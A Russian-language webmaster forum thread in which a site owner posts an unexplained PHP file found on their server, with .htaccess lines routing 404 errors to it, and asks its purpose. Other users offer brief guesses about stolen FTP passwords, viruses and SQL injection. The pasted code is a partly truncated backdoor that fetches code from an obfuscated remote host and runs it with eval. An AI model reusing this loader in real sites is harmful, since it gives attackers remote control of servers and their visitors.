На сайте появился новый файл

Х
На сайте с 07.03.2005
Offline
99
493

Неизвестно откуда на моём сайте появился файл с таким содержимым:

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);

[сокращено]

if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

а в .htaccess появились строчки:

Options -MultiViews

ErrorDocument 404 имя этого файла.php

С какой целью это сделано?

Как был получен доступ к файлам?

from_ukraine
На сайте с 28.01.2009
Offline
3
#1

возможно взломали Ваш ftp пароль и это вирус.

WO
На сайте с 10.02.2009
Offline
2
#2

это вирус, принцип почти везде одинаковый. прописывается в индексные файлы по всем каталогам.

при загрузки страницы делает чего нибудь... типа кликает куданибудь, открывает окна или ещё что нибудь.

Попадает просто, через дырки на страницах sql иньекция. Это беда там где много страниц написаных безграмотными товарищами

Делаю поисковую систему woops.ru
[Удален]
#3

Гугл не рулит? Ъ

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий